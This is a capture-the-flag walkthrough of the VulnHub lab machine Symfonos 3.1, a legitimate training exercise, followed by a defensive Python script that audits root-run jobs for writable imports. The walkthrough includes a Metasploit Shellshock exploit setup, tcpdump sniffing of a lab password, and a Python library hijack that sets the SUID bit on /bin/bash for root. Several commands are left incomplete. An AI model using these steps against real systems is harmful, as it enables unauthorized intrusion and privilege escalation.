SYMFONOS: 3.1 Vuln Hub Machine Walkthrough

Symfonos 3.1 VulnHub

Intermediate real life based machine designed to test your skill at enumeration. If you get stuck, remember to try different wordlists, avoid rabbit holes and enumerate everything thoroughly.

Security Level: Intermediate

Penetrating Methodology:

1. Network Scanning
2. Scanning
  • NmapAutomator
3. Enumeration
  • Web Directory Search (dirb)
4. Exploitation
  • Msfconsole
  • SSH
5. Privilege Escalation
  • Exploiting /bin/bash

Network Scanning:

We downloaded, imported and ran the virtual machine (.ova file) in VirtualBox; the machine is automatically assigned an IP address by the network's DHCP server. To begin, we find the IP address of our target machine with the following command, which lists all the IPs on an internal network.

Commands: sudo arp-scan -l


We found the target's IP address. The next step is to scan the target machine with the NmapAutomator tool to find the open ports and services.


As we can see, port 80 is open. We opened the IP address in our browser and a scary image was displayed. Then we looked at the page source, where one question was written in green: "can you bust the underworld?" We thought this might be a hint to look for a directory, maybe one named underworld.

It was time to use dirb for directory enumeration to look for some useful directories. We got one directory named /cgi-bin/.

Command: dirb

Now we bust the underworld. We accessed the directory /cgi-bin/underworld/ in the browser and got a webpage displaying information like time, users and load average. I think this is probably a Shellshock vulnerability.


The CGI (Common Gateway Interface) defines a way for a web server to interact with external content-generating programs, which are often referred to as CGI programs or CGI scripts.

We looked on Google for any vulnerabilities present in CGI and found that there is a critical vulnerability: Shellshock remote command injection, which allows attackers to execute arbitrary code remotely via the Unix Bash shell. When we search Metasploit for shellshock, there is an exploit available for this vulnerability.

use exploit/multi/http/apache_mod_cgi_bash_env_exec
set rhost
set lhost
set targeturi /cgi-bin/underworld
run

First establish your shell using this command: python -c 'import pty;pty.spawn("/bin/bash")'

We checked sudo, SUID and writable permissions for this user, but all in vain. Since tcpdump was installed on the target system, we used it to capture usernames and passwords. We ran these commands from the /tmp directory.

Commands: cd /tmp
tcpdump -D
tcpdump -i lo

We got one username, hades, and the password PTpZTfU4vxgzvRBE. After that, we tried logging in over SSH.

Privilege Escalation:

We thought of trying pspy64, a small command-line tool that monitors scheduled Linux processes. We served it from our local server, downloaded it into the /tmp directory of the target system and gave it execute permission before running it.

Commands: cd /tmp
wget
chmod +x pspy64


After executing the script, we looked for the writable directories for this user and got one directory named /opt/ftpclient. In this directory we have two files and statuscheck.txt. When we check the content of there is ftplib

After that, we ran find to locate it, looked at the path in the response and checked the permissions on that path. So we have root permissions.

Commands: cd /opt/ftpclient
find / -name "" 2>/dev/null
ls -la /usr/lib/python2.7/


Now modify this file's content with the nano text editor so that it uses the os module to change permissions through chmod.

Command: nano /usr/lib/python2.7/

import os
import sys

os.system("chmod 4755 /bin/bash")

Now execute your script; if it does not work, check the permissions. Remember to start the /bin/bash command with a space when you execute it. We got the root shell of the target system and eventually got the root flag.

Commands: ls -la /bin/bash
/bin/bash -p
whoami
cd /root
cat proof.txt
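
The escalation above depended on a module under /usr/lib/python2.7/ (ftplib) being editable by the hades account while its code ran with root privileges. The following Python audit is an added example, not part of the original walkthrough: it lists the modules a script imports and reports any that a non-root account could alter. The function names and the demo files are constructed for illustration, and it assumes the audited script parses under the Python that runs the audit.

```python
import ast, os, stat, tempfile

def imported_modules(source):
    """Top-level module names a script imports (source must parse under this Python)."""
    names = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return names

def resolve(name, search_path):
    """First module file or package on search_path that `import name` would load."""
    for d in search_path:
        for cand in (os.path.join(d, name + ".py"), os.path.join(d, name, "__init__.py")):
            if os.path.isfile(cand):
                return cand
    return None

def write_risks(path, trusted_uids=(0,)):
    """Reasons an untrusted account could replace `path` or plant a file beside it."""
    reasons = []
    for p in (path, os.path.dirname(path)):
        st = os.stat(p)
        if st.st_uid not in trusted_uids:
            reasons.append("%s owned by uid %d" % (p, st.st_uid))
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            reasons.append("%s mode %o is group/world-writable" % (p, stat.S_IMODE(st.st_mode)))
    return reasons

def audit(source, search_path, trusted_uids=(0,)):
    """Map each resolvable import to the reasons it is unsafe for a root-run job."""
    found = ((n, resolve(n, search_path)) for n in sorted(imported_modules(source)))
    checked = ((n, write_risks(p, trusted_uids)) for n, p in found if p)
    return {n: r for n, r in checked if r}

def demo():
    """Constructed library directory: ftplib.py is group-writable, os.py is not."""
    lib = tempfile.mkdtemp()
    for name, mode in (("ftplib.py", 0o664), ("os.py", 0o644)):
        path = os.path.join(lib, name)
        open(path, "w").close()
        os.chmod(path, mode)
    # The source string is a constructed stand-in for the scheduled script.
    return audit("import os\nimport ftplib\n", [lib], trusted_uids=(0, os.getuid()))

if __name__ == "__main__":
    print(demo())
```

On a real host, pass the interpreter's own sys.path as search_path and keep trusted_uids at its default so that only root-owned, non-group-writable modules pass.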


Written By

Name : Akash Kumar

